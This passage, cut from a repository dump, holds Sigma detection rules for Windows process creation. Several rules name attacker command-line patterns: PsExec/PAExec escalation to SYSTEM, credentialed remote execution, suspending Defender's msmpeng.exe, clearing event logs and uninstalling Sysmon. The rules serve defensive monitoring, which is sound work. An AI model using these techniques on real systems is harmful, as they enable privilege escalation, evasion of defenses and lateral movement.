    "content": "title: Psexec Execution\nid: 730fc21b-eaff-474b-ad23-90fd265d4988\nstatus: test\ndescription: Detects user accept agreement execution in psexec commandline\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: omkar72\ndate: 2020-10-30\nmodified: 2023-02-28\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1569\n    - attack.t1021\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\psexec.exe'\n        - OriginalFileName: 'psexec.c'\n    condition: selection\nfalsepositives:\n    - Administrative scripts.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml",
    "content": "title: PsExec/PAExec Escalation to LOCAL SYSTEM\nid: 8834e2f7-6b4b-4f09-8906-d2276470ee23\nrelated:\n    - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags\n      type: similar\nstatus: test\ndescription: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.poweradmin.com/paexec/\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-23\nmodified: 2024-03-05\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sys: # Escalation to LOCAL_SYSTEM\n        CommandLine|contains|windash:\n            # Note that you don't need to add the \".exe\" part when using psexec/paexec\n            # The \"-\" can also be replaced with \"/\"\n            # The order of args isn't important\n            # \"cmd\" can be replaced by \"powershell\", \"pwsh\" or any other console like software\n            - ' -s cmd'\n            - ' -s -i cmd'\n            - ' -i -s cmd'\n            # Pwsh (For PowerShell 7)\n            - ' -s pwsh'\n            - ' -s -i pwsh'\n            - ' -i -s pwsh'\n            # PowerShell (For PowerShell 5)\n            - ' -s powershell'\n            - ' -s -i powershell'\n            - ' -i -s powershell'\n    selection_other:\n        CommandLine|contains:\n            - 'psexec'\n            - 'paexec'\n            - 'accepteula'\n    condition: all of selection_*\nfalsepositives:\n    - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)\n    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml",
    "content": "title: Potential PsExec Remote Execution\nid: ea011323-7045-460b-b2d7-0f7442ea6b38\nstatus: test\ndescription: Detects potential psexec commands that initiate execution on a remote system via common commandline flags used by the utility\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.poweradmin.com/paexec/\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\nmodified: 2025-09-01\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Accepting EULA in commandline - often used in automated attacks\n        CommandLine|contains|all:\n            - 'accepteula'\n            - ' -u '\n            - ' -p '\n            - ' \\\\\\\\'\n    filter_main_localhost:\n        CommandLine|contains:\n            - '\\\\\\\\localhost'\n            - '\\\\\\\\127.'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml",
    "content": "title: PsExec Service Execution\nid: fdfcbd78-48f1-4a4b-90ac-d82241e368c5\nrelated:\n    - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\n      type: obsolete\nstatus: test\ndescription: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.youtube.com/watch?v=ro2QuZTIMBM\nauthor: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)\ndate: 2017-06-12\nmodified: 2023-02-28\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image: 'C:\\Windows\\PSEXESVC.exe'\n        - OriginalFileName: 'psexesvc.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative tasks\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml",
    "content": "title: PsExec Service Child Process Execution as LOCAL SYSTEM\nid: 7c0dcd3d-acf8-4f71-9570-f448b0034f94\nrelated:\n    - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\n      type: similar\nstatus: test\ndescription: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-02-28\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: 'C:\\Windows\\PSEXESVC.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection\nfalsepositives:\n    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml",
    "content": "title: Suspicious Use of PsLogList\nid: aae1243f-d8af-40d8-ab20-33fc6d0c55bc\nstatus: test\ndescription: Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs\nreferences:\n    - https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/\n    - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList\n    - https://twitter.com/EricaZelic/status/1614075109827874817\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2024-03-05\ntags:\n    - attack.discovery\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'psloglist.exe'\n        - Image|endswith:\n              - '\\psloglist.exe'\n              - '\\psloglist64.exe'\n    selection_cli_eventlog:\n        CommandLine|contains:\n            - ' security'\n            - ' application'\n            - ' system'\n    selection_cli_flags:\n        CommandLine|contains|windash:\n            - ' -d'\n            - ' -x'\n            - ' -s'\n            - ' -c' # Clear event log after displaying\n            - ' -g' # Export an event log as an evt file.\n    condition: all of selection_*\nfalsepositives:\n    - Another tool that uses the command line switches of PsLogList\n    - Legitimate use of PsLogList by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml",
    "content": "title: Sysinternals PsService Execution\nid: 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f\nstatus: test\ndescription: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psservice\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-16\nmodified: 2023-02-24\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'psservice.exe'\n        - Image|endswith:\n              - '\\PsService.exe'\n              - '\\PsService64.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of PsService by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml",
    "content": "title: Sysinternals PsSuspend Execution\nid: 48bbc537-b652-4b4e-bd1d-281172df448f\nrelated:\n    - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78\n      type: similar\nstatus: test\ndescription: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend\n    - https://twitter.com/0gtweet/status/1638069413717975046\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-23\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'pssuspend.exe'\n        - Image|endswith:\n              - '\\pssuspend.exe'\n              - '\\pssuspend64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml",
    "content": "title: Sysinternals PsSuspend Suspicious Execution\nid: 4beb6ae0-f85b-41e2-8f18-8668abc8af78\nrelated:\n    - id: 48bbc537-b652-4b4e-bd1d-281172df448f # Basic Execution\n      type: similar\nstatus: test\ndescription: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend\n    - https://twitter.com/0gtweet/status/1638069413717975046\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'pssuspend.exe'\n        - Image|endswith:\n              - '\\pssuspend.exe'\n              - '\\pssuspend64.exe'\n    selection_cli:\n        # Add more interesting/critical processes\n        CommandLine|contains: 'msmpeng.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml",
    "content": "title: Potential File Overwrite Via Sysinternals SDelete\nid: a4824fca-976f-4964-b334-0621379e84c4\nstatus: test\ndescription: Detects the use of SDelete to erase a file rather than the free space\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nauthor: frack113\ndate: 2021-06-03\nmodified: 2023-02-28\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: sdelete.exe\n    filter:\n        CommandLine|contains:\n            - ' -h'\n            - ' -c'\n            - ' -z'\n            - ' /\\?'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml",
    "content": "title: Potential Privilege Escalation To LOCAL SYSTEM\nid: 207b0396-3689-42d9-8399-4222658efc99\nrelated:\n    - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 # PsExec specific rule\n      type: similar\nstatus: test\ndescription: Detects an unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM privileges\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.poweradmin.com/paexec/\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-05-22\nmodified: 2024-03-05\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Escalation to LOCAL_SYSTEM\n        CommandLine|contains|windash:\n            # Note that you don't need to add the \".exe\" part when using psexec/paexec\n            # The \"-\" can also be replaced with \"/\"\n            # The order of args isn't important\n            # \"cmd\" can be replaced by \"powershell\", \"pwsh\" or any other console like software\n            - ' -s cmd'\n            - ' -s -i cmd'\n            - ' -i -s cmd'\n            # Pwsh (For PowerShell 7)\n            - ' -s pwsh'\n            - ' -s -i pwsh'\n            - ' -i -s pwsh'\n            # PowerShell (For PowerShell 5)\n            - ' -s powershell'\n            - ' -s -i powershell'\n            - ' -i -s powershell'\n    filter_main_exclude_coverage:\n        # This filter excludes strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23\n        CommandLine|contains:\n            - 'paexec'\n            - 'PsExec'\n            - 'accepteula'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Weird admins that rename their tools\n    - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml",
    "content": "title: Sysmon Configuration Update\nid: 87911521-7098-470b-a459-9a57fc80bdfd\nstatus: test\ndescription: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-09\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith:\n              - \\Sysmon64.exe\n              - \\Sysmon.exe\n        - Description: 'System activity monitor'\n    selection_cli:\n        CommandLine|contains|windash: '-c'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrators might use this command to update Sysmon configuration.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml",
    "content": "title: Uninstall Sysinternals Sysmon\nid: 6a5f68d1-c4b5-46b9-94ee-5324892ea939\nstatus: test\ndescription: Detects the removal of Sysmon, which could be a potential attempt at defense evasion\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon\nauthor: frack113\ndate: 2022-01-12\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith:\n              - \\Sysmon64.exe\n              - \\Sysmon.exe\n        - Description: 'System activity monitor'\n    selection_cli:\n        CommandLine|contains|windash: '-u'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrators might use this command to remove Sysmon for debugging purposes\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml",
    "content": "title: Potential Binary Impersonating Sysinternals Tools\nid: 7cce6fc8-a07f-4d84-a53e-96e1879843c9\nstatus: test\ndescription: |\n    Detects binaries that use the same name as legitimate sysinternals tools to evade detection.\n    This rule looks for the execution of binaries that are named similarly to Sysinternals tools.\n    Adversaries may rename their malicious tools as legitimate Sysinternals tools to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite\nauthor: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2021-12-20\nmodified: 2025-04-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exe:\n        Image|endswith:\n            - '\\accesschk.exe'\n            - '\\accesschk64.exe'\n            - '\\AccessEnum.exe'\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n            - '\\ADInsight.exe'\n            - '\\ADInsight64.exe'\n            - '\\adrestore.exe'\n            - '\\adrestore64.exe'\n            - '\\Autologon.exe'\n            - '\\Autologon64.exe'\n            - '\\Autoruns.exe'\n            - '\\Autoruns64.exe'\n            - '\\autorunsc.exe'\n            - '\\autorunsc64.exe'\n            - '\\Bginfo.exe'\n            - '\\Bginfo64.exe'\n            - '\\Cacheset.exe'\n            - '\\Cacheset64.exe'\n            - '\\Clockres.exe'\n            - '\\Clockres64.exe'\n            - '\\Contig.exe'\n            - '\\Contig64.exe'\n            - '\\Coreinfo.exe'\n            - '\\Coreinfo64.exe'\n            - '\\CPUSTRES.EXE'\n            - '\\CPUSTRES64.EXE'\n            - '\\ctrl2cap.exe'\n            - '\\Dbgview.exe'\n            - '\\dbgview64.exe'\n            - '\\Desktops.exe'\n            - '\\Desktops64.exe'\n            - '\\disk2vhd.exe'\n            - '\\disk2vhd64.exe'\n            - '\\diskext.exe'\n            - '\\diskext64.exe'\n            - '\\Diskmon.exe'\n            - '\\Diskmon64.exe'\n            - '\\DiskView.exe'\n            - '\\DiskView64.exe'\n            - '\\du.exe'\n            - '\\du64.exe'\n            - '\\efsdump.exe'\n            - '\\FindLinks.exe'\n            - '\\FindLinks64.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n            - '\\hex2dec.exe'\n            - '\\hex2dec64.exe'\n            - '\\junction.exe'\n            - '\\junction64.exe'\n            - '\\ldmdump.exe'\n            - '\\listdlls.exe'\n            - '\\listdlls64.exe'\n            - '\\livekd.exe'\n            - '\\livekd64.exe'\n            - '\\loadOrd.exe'\n            - '\\loadOrd64.exe'\n            - '\\loadOrdC.exe'\n            - '\\loadOrdC64.exe'\n            - '\\logonsessions.exe'\n            - '\\logonsessions64.exe'\n            - '\\movefile.exe'\n            - '\\movefile64.exe'\n            - '\\notmyfault.exe'\n            - '\\notmyfault64.exe'\n            - '\\notmyfaultc.exe'\n            - '\\notmyfaultc64.exe'\n            - '\\ntfsinfo.exe'\n            - '\\ntfsinfo64.exe'\n            - '\\pendmoves.exe'\n            - '\\pendmoves64.exe'\n            - '\\pipelist.exe'\n            - '\\pipelist64.exe'\n            - '\\portmon.exe'\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\Procmon.exe'\n            - '\\Procmon64.exe'\n            - '\\psExec.exe'\n            - '\\psExec64.exe'\n            - '\\psfile.exe'\n            - '\\psfile64.exe'\n            - '\\psGetsid.exe'\n            - '\\psGetsid64.exe'\n            - '\\psInfo.exe'\n            - '\\psInfo64.exe'\n            - '\\pskill.exe'\n            - '\\pskill64.exe'\n            - '\\pslist.exe'\n            - '\\pslist64.exe'\n            - '\\psLoggedon.exe'\n            - '\\psLoggedon64.exe'\n            - '\\psloglist.exe'\n            - '\\psloglist64.exe'\n            - '\\pspasswd.exe'\n            - '\\pspasswd64.exe'\n            - '\\psping.exe'\n            - '\\psping64.exe'\n            - '\\psService.exe'\n            - '\\psService64.exe'\n            - '\\psshutdown.exe'\n            - '\\psshutdown64.exe'\n            - '\\pssuspend.exe'\n            - '\\pssuspend64.exe'\n            - '\\RAMMap.exe'\n            - '\\RAMMap64.exe'\n            - '\\RDCMan.exe'\n            - '\\RegDelNull.exe'\n            - '\\RegDelNull64.exe'\n            - '\\regjump.exe'\n            - '\\ru.exe'\n            - '\\ru64.exe'\n            - '\\sdelete.exe'\n            - '\\sdelete64.exe'\n            - '\\ShareEnum.exe'\n            - '\\ShareEnum64.exe'\n            - '\\shellRunas.exe'\n            - '\\sigcheck.exe'\n            - '\\sigcheck64.exe'\n            - '\\streams.exe'\n            - '\\streams64.exe'\n            - '\\strings.exe'\n            - '\\strings64.exe'\n            - '\\sync.exe'\n            - '\\sync64.exe'\n            - '\\Sysmon.exe'\n            - '\\Sysmon64.exe'\n            - '\\tcpvcon.exe'\n            - '\\tcpvcon64.exe'\n            - '\\tcpview.exe'\n            - '\\tcpview64.exe'\n            - '\\Testlimit.exe'\n            - '\\Testlimit64.exe'\n            - '\\vmmap.exe'\n            - '\\vmmap64.exe'\n            - '\\Volumeid.exe'\n            - '\\Volumeid64.exe'\n            - '\\whois.exe'\n            - '\\whois64.exe'\n            - '\\Winobj.exe'\n            - '\\Winobj64.exe'\n            - '\\ZoomIt.exe'\n            - '\\ZoomIt64.exe'\n    selection_arm64:\n        Image|endswith:\n            - '\\accesschk64a.exe'\n            - '\\ADExplorer64a.exe'\n            - '\\ADInsight64a.exe'\n            - '\\adrestore64a.exe'\n            - '\\Autologon64a.exe'\n            - '\\Autoruns64a.exe'\n            - '\\autorunsc64a.exe'\n            - '\\Clockres64a.exe'\n            - '\\Contig64a.exe'\n            - '\\Coreinfo64a.exe'\n            - '\\Dbgview64a.exe'\n            - '\\disk2vhd64a.exe'\n            - '\\diskext64a.exe'\n            - '\\DiskView64a.exe'\n            - '\\du64a.exe'\n            - '\\FindLinks64a.exe'\n            - '\\handle64a.exe'\n            - '\\hex2dec64a.exe'\n            - '\\junction64a.exe'\n            - '\\LoadOrd64a.exe'\n            - '\\LoadOrdC64a.exe'\n            - '\\logonsessions64a.exe'\n            - '\\movefile64a.exe'\n            - '\\notmyfault64a.exe'\n            - '\\notmyfaultc64a.exe'\n            - '\\pendmoves64a.exe'\n            - '\\pipelist64a.exe'\n            - '\\procdump64a.exe'\n            - '\\procexp64a.exe'\n            - '\\Procmon64a.exe'\n            - '\\PsExec64a.exe'\n            - '\\psfile64a.exe'\n            - '\\PsGetsid64a.exe'\n            - '\\PsInfo64a.exe'\n            - '\\pskill64a.exe'\n            - '\\psloglist64a.exe'\n            - '\\pspasswd64a.exe'\n            - '\\psping64a.exe'\n            - '\\PsService64a.exe'\n            - '\\pssuspend64a.exe'\n            - '\\RAMMap64a.exe'\n            - '\\RegDelNull64a.exe'\n            - '\\ru64a.exe'\n            - '\\sdelete64a.exe'\n            - '\\sigcheck64a.exe'\n            - '\\streams64a.exe'\n            - '\\strings64a.exe'\n            - '\\sync64a.exe'\n            - '\\Sysmon64a.exe'\n            - '\\tcpvcon64a.exe'\n            - '\\tcpview64a.exe'\n            - '\\vmmap64a.exe'\n            - '\\whois64a.exe'\n            - '\\Winobj64a.exe'\n            - '\\ZoomIt64a.exe'\n    filter_valid:\n        - Company:\n              - 'Sysinternals - www.sysinternals.com'\n              - 'Sysinternals'\n        - Product|startswith: 'Sysinternals'\n    filter_empty:\n        - Company: null\n        - Product: null\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml",
    "content": "title: Sysprep on AppData Folder\nid: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e\nstatus: test\ndescription: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)\nreferences:\n    - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets\n    - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-22\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sysprep.exe'\n        CommandLine|contains: '\\AppData\\'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml",
    "content": "title: Suspicious Execution of Systeminfo\nid: 0ef56343-059e-4cb6-adc1-4c3c967c5e46\nstatus: test\ndescription: Detects usage of the \"systeminfo\" command to retrieve information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo\nauthor: frack113\ndate: 2022-01-01\nmodified: 2022-07-14\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\systeminfo.exe'\n        - OriginalFileName: 'sysinfo.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml",
    "content": "title: Potential Signing Bypass Via Windows Developer Features\nid: a383dec4-deec-4e6e-913b-ed9249670848\nrelated:\n    - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1\n      type: similar\nstatus: test\ndescription: Detects when a user enables developer features such as \"Developer Mode\" or \"Application Sideloading\", which allow the user to install untrusted packages.\nreferences:\n    - Internal Research\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SystemSettingsAdminFlows.exe'\n        - OriginalFileName: 'SystemSettingsAdminFlows.EXE'\n    selection_flag:\n        CommandLine|contains: 'TurnOnDeveloperFeatures'\n    selection_options:\n        CommandLine|contains:\n            - 'DeveloperUnlock'\n            - 'EnableSideloading'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml",
    "content": "title: Suspicious Recursive Takeown\nid: 554601fb-9b71-4bcc-abf4-21a611be4fde\nstatus: test\ndescription: Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant them higher permissions on specific files and folders\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility\nauthor: frack113\ndate: 2022-01-30\nmodified: 2022-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1222.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\takeown.exe'\n        CommandLine|contains|all:\n            - '/f '\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml",
    "content": "title: Tap Installer Execution\nid: 99793437-3e16-439b-be0f-078782cf953d\nstatus: test\ndescription: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques\nreferences:\n    - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019-10-24\nmodified: 2023-12-11\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\tapinstall.exe'\n    filter_optional_avast:\n        Image|contains:\n            - ':\\Program Files\\Avast Software\\SecureLine VPN\\'\n            - ':\\Program Files (x86)\\Avast Software\\SecureLine VPN\\'\n    filter_optional_openvpn:\n        Image|contains: ':\\Program Files\\OpenVPN Connect\\drivers\\tap\\'\n    filter_optional_protonvpn:\n        Image|contains: ':\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tar_compression.yml",
    "content": "title: Compressed File Creation Via Tar.EXE\nid: 418a3163-3247-4b7b-9933-dcfcb7c52ea9\nstatus: test\ndescription: |\n    Detects execution of \"tar.exe\" in order to create a compressed file.\n    Adversaries may abuse various utilities to compress or encrypt data before exfiltration.\nreferences:\n    - https://unit42.paloaltonetworks.com/chromeloader-malware/\n    - https://lolbas-project.github.io/lolbas/Binaries/Tar/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage\nauthor: Nasreddine Bencherchali (Nextron Systems), AdmU3\ndate: 2023-12-19\ntags:\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1560\n    - attack.t1560.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\tar.exe'\n        - OriginalFileName: 'bsdtar'\n    selection_create:\n        CommandLine|contains:\n            - '-c'\n            - '-r'\n            - '-u'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tar_extraction.yml",
    "content": "title: Compressed File Extraction Via Tar.EXE\nid: bf361876-6620-407a-812f-bfe11e51e924\nstatus: test\ndescription: |\n    Detects execution of \"tar.exe\" in order to extract a compressed file.\n    Adversaries may abuse various utilities in order to decompress data to avoid detection.\nreferences:\n    - https://unit42.paloaltonetworks.com/chromeloader-malware/\n    - https://lolbas-project.github.io/lolbas/Binaries/Tar/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage\nauthor: AdmU3\ndate: 2023-12-19\ntags:\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1560\n    - attack.t1560.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\tar.exe'\n        - OriginalFileName: 'bsdtar'\n    selection_extract:\n        CommandLine|contains: '-x'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_taskkill_sep.yml",
